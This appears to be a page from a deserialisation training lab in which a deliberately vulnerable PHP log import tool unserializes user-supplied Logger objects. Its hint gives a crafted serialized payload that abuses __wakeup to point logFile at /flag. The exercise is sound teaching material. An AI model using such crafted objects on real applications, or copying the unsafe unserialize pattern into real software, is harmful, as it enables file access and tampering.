Deserialisation Lab 2 - Magic Method (__wakeup) Abuse

---

Log Import Tool

This tool accepts a base64-encoded serialized Logger object and processes it.

The Logger class has a __wakeup() method that runs when deserialized.

Example safe payload (base64):

Tzo2OiJMb2dnZXIiOjI6e3M6NzoibG9nRmlsZSI7czoxMjoiL3RtcC9hcHAubG9nIjtzOjEwOiJsb2dNZXNzYWdlIjtzOjE0OiJVc2VyIGxvZ2dlZCBpbiI7fQ==

Decoded: O:6:"Logger":2:{s:7:"logFile";s:12:"/tmp/app.log";s:10:"logMessage";s:14:"User logged in";}

Serialized Logger payload (base64):
Tzo2OiJMb2dnZXIiOjI6e3M6NzoibG9nRmlsZSI7czoxMjoiL3RtcC9hcHAubG9nIjtzOjEwOiJsb2dNZXNzYWdlIjtzOjE0OiJVc2VyIGxvZ2dlZCBpbiI7fQ==

Hint (click to reveal)

Craft a Logger object where logFile is set to /flag.
Serialized: O:6:"Logger":2:{s:7:"logFile";s:5:"/flag";s:10:"logMessage";s:4:"pwnd";}
Base64-encode it and submit. The __wakeup method triggers on unserialize.

Back to Deserialisation Labs